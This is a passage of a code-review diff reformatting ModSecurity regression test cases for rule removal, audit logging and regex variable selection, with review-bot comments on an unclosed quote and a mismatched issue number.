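Review bot: The last rule in this hunk, `"SecRule ARGS \"@rx a\" \"id:1,phase:1,block"`, opens its action list with `\"` and never closes it. It is unchanged context, but the file is being rewritten anyway, so `\"id:1,phase:1,block\"` could go in with it. The case also asserts only `"http_code": 200`, which is the outcome both when DetectionOnly suppresses the deny and when rule 1 is never evaluated or never matches. An additional `debug_log` or `error_log` expectation showing that rule 1 matched would let the test tell the two apart. The rules array continues past the end of the hunk.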
@@ -1,35 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing audit log part H should output when deny - issue-2000", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing audit log part H should output when deny - issue-2000", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"index.php?foo=bar&a=xxx", - "method":"GET", - "body": "" + "uri": "index.php?foo=bar&a=xxx", + "method": "GET", + "body": [ + "" + ] }, - "expected": { - "http_code": 403, - "audit_log": "id \"1234" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - - "server":{ - "ip":"127.0.0.1", - "port":80 + "expected": { + "audit_log": "id \"1234", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAuditLogParts ABIJDEFHZ", "SecAuditEngine RelevantOnly", diff --git a/test/test-cases/regression/issue-2099.json b/test/test-cases/regression/issue-2099.json index fff4aa4cc8..2b56572536 100644 --- a/test/test-cases/regression/issue-2099.json +++ b/test/test-cases/regression/issue-2099.json 
@@ -1,195 +1,260 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/remote.php/webdav?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", - "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" + "uri": "/remote.php/webdav?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", + "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ 
- "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById against - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/remote.php?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/remote.php?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", - "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", + "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, 
+ "title": "Testing ctl:ruleRemoveByTag - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/remote.php/webdav?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", - "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/remote.php/webdav?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", + "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag against - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": 
"curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/remote.php?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", - "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/remote.php?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", + "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveTargetByTag - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"1.2.3.4", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveTargetByTag - issue 2099", + "client": { + "ip": "1.2.3.4", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/test.php?a=a", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/test.php?a=a", - "method":"GET", - "body": "" - }, - "server":{ - 
"ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", - "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", + "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveTargetByTag against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"1.2.3.4", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveTargetByTag against - issue 2099", + "client": { + "ip": "1.2.3.4", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/index.php?a=a", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", - "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/index.php?a=a", + "method": "GET", + "body": [ + "" + ] + }, + 
"response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", + "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] - } + } ] - diff --git a/test/test-cases/regression/issue-2111.json b/test/test-cases/regression/issue-2111.json index c3faa7d216..faa8fc6aa8 100644 --- a/test/test-cases/regression/issue-2111.json +++ b/test/test-cases/regression/issue-2111.json 
@@ -1,33 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById with range - issue 1444", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById with range - issue 1444", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"index.php?foo=bar&z=xxx", - "method":"GET", - "body": "" + "uri": "index.php?foo=bar&z=xxx", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"127.0.0.1", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:foo \"@rx ^bar$\" \"id:100,phase:1,ctl:ruleRemoveById=200-1999\"", - "SecRule ARGS:z \"@rx ^xxx$\" \"id:1010,phase:1,deny,status:403\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:foo \"@rx ^bar$\" \"id:100,phase:1,ctl:ruleRemoveById=200-1999\"", + "SecRule ARGS:z \"@rx ^xxx$\" \"id:1010,phase:1,deny,status:403\"" ] } ] diff --git a/test/test-cases/regression/issue-2196.json b/test/test-cases/regression/issue-2196.json index 44347bd08d..83f142f452 100644 --- a/test/test-cases/regression/issue-2196.json +++ b/test/test-cases/regression/issue-2196.json 
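Review bot: The rewritten `title` line still reads "Testing ctl:ruleRemoveById with range - issue 1444" in a file named issue-2111.json, and the case has no `url` field the way the issue-1850 and issue-1941 cases do. If 1444 is a stale reference, `"title": "Testing ctl:ruleRemoveById with range - issue 2111"` would let someone trace a failing range-removal test back to the right report. If both issues are relevant, the title could name both.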
@@ -1,35 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing audit log not written when nolog - issue-2196", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing audit log not written when nolog - issue-2196", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"index.php?foo=bar&a=xxx", - "method":"GET", - "body": "" + "uri": "index.php?foo=bar&a=xxx", + "method": "GET", + "body": [ + "" + ] }, - "expected": { - "http_code": 200, - "audit_log": "\\A[\\s\\S]{0}\\z" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - - "server":{ - "ip":"127.0.0.1", - "port":80 + "expected": { + "audit_log": "\\A[\\s\\S]{0}\\z", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAuditLogParts ABIJDEFHZ", "SecAuditEngine RelevantOnly", diff --git a/test/test-cases/regression/issue-2296.json b/test/test-cases/regression/issue-2296.json index bc64d19bd2..4947aee1c1 100644 --- a/test/test-cases/regression/issue-2296.json +++ b/test/test-cases/regression/issue-2296.json 
@@ -1,433 +1,472 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression (1/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression (1/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"Operator `Rx' with parameter `test' against variable `ARGS:THIS'" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "Operator `Rx' with parameter `test' against variable `ARGS:THIS'", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression (2/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression (2/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":200, - "debug_log":"Rule returned 0", - "error_log":"" + "expected": { + "debug_log": "Rule returned 0", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIz$/ \"test\" \"id:1,deny,status:302\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIz$/ \"test\" \"id:1,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - msg (3/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - msg (3/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"msg \"Testing is a simple test\"" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "msg \"Testing is a simple test\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}'\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - matched_vars (4/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - matched_vars (4/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"msg \"Testing is a simple test\"" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "msg \"Testing is a simple test\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - rule (5/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - rule (5/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no 
need." ] }, - "expected":{ - "http_code":403, - "debug_log":"Target value: .1. .Variable: RULE:id.", - "error_log":"Operator `Rx' with parameter `1' against variable `RULE:id' .Value: `1' ." + "expected": { + "debug_log": "Target value: .1. .Variable: RULE:id.", + "error_log": "Operator `Rx' with parameter `1' against variable `RULE:id' .Value: `1' .", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRule RULE:/^Id$/ \"1\" \"id:1,msg:'Testing %{RULE.id}% -- ',deny\"" + "rules": [ + "SecRuleEngine On", + "SecRule RULE:/^Id$/ \"1\" \"id:1,msg:'Testing %{RULE.id}% -- ',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - TX (6/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - TX (6/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code":437, - "error_log":"`Within' with parameter `/name1/' against variable `TX:header_name_name1'" + "expected": { + "error_log": "`Within' with parameter `/name1/' against variable `TX:header_name_name1'", + "http_code": 437 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", - "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,chain,capture\"", - "SecRule TX:/^header_name_/ \"@within %{TX:/esTrictEd_headers/}\" \"setvar:'tx.matched=1'\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", + "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,chain,capture\"", + "SecRule TX:/^header_name_/ \"@within %{TX:/esTrictEd_headers/}\" \"setvar:'tx.matched=1'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - TX (7/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - TX (7/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/", + "method": "GET", + 
